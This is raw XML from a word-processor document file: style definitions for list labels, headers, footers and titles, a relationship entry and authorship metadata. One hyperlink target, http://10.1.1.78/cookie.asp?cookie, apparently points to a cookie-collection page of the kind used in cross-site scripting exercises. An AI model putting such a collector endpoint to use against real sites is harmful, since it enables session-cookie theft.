    <w:name w:val="ListLabel 3"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="华文行楷" w:hAnsi="华文行楷" w:eastAsia="华文行楷"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel4">
    <w:name w:val="ListLabel 4"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="华文行楷" w:hAnsi="华文行楷" w:eastAsia="华文行楷"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel5">
    <w:name w:val="ListLabel 5"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="华文行楷" w:hAnsi="华文行楷" w:eastAsia="华文行楷"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel6">
    <w:name w:val="ListLabel 6"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="华文行楷" w:hAnsi="华文行楷" w:eastAsia="华文行楷"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel7">
    <w:name w:val="ListLabel 7"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="华文行楷"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel8">
    <w:name w:val="ListLabel 8"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="华文行楷"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32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9">
    <w:name w:val="ListLabel 9"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="华文行楷"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel10">
    <w:name w:val="ListLabel 10"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="华文行楷"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel11">
    <w:name w:val="ListLabel 11"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:eastAsia="华文行楷"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32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a4"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00545b7d"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="6" w:space="1" w:color="00000A"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153" w:leader="none"/>
        <w:tab w:val="right" w:pos="8306" w:leader="none"/>
      </w:tabs>
      <w:suppressAutoHyphens w:val="false"/>
      <w:snapToGrid w:val="false"/>
      <w:jc w:val="center"/>
      <w:textAlignment w:val="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="" w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="Footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00545b7d"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153" w:leader="none"/>
        <w:tab w:val="right" w:pos="8306" w:leader="none"/>
      </w:tabs>
      <w:suppressAutoHyphens w:val="false"/>
      <w:snapToGrid w:val="false"/>
      <w:jc w:val="left"/>
      <w:textAlignment w:val="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="" w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Standard" w:customStyle="1">
    <w:name w:val="Standard"/>
    <w:qFormat/>
    <w:rsid w:val="00545b7d"/>
    <w:pPr>
      <w:widowControl w:val="false"/>
      <w:suppressAutoHyphens w:val="true"/>
      <w:bidi w:val="0"/>
      <w:jc w:val="left"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="DejaVu Serif" w:hAnsi="DejaVu Serif" w:eastAsia="宋体" w:cs="Lohit Hindi" w:eastAsiaTheme="minorEastAsia"/>
      <w:color w:val="00000A"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="a7"/>
    <w:qFormat/>
    <w:rsid w:val="00545b7d"/>
    <w:pPr>
      <w:suppressAutoHyphens w:val="false"/>
      <w:spacing w:before="240" w:after="60"/>
      <w:jc w:val="center"/>
      <w:textAlignment w:val="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="" w:cstheme="minorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Default" w:customStyle="1">
    <w:name w:val="Default"/>
    <w:qFormat/>
    <w:rsid w:val="00165b5b"/>
    <w:pPr>
      <w:widowControl w:val="false"/>
      <w:bidi w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListContents">
    <w:name w:val="List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10.1.1.2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hyperlink" Target="http://10.1.1.78/cookie.asp?cookie" TargetMode="External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Application>LibreOffice/5.1.2.2$Linux_X86_64 LibreOffice_project/10m0$Build-2</Application>
  <Pages>10</Pages>
  <Words>281</Words>
  <Characters>1504</Characters>
  <CharactersWithSpaces>1703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2013-06-02T06:33:00Z</dcterms:created>
  <dc:creator>王金麟</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <cp:lastPrinted>2013-06-30T07:48:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-05-25T23:15:13Z</dcterms:modified>
  <cp:revision>186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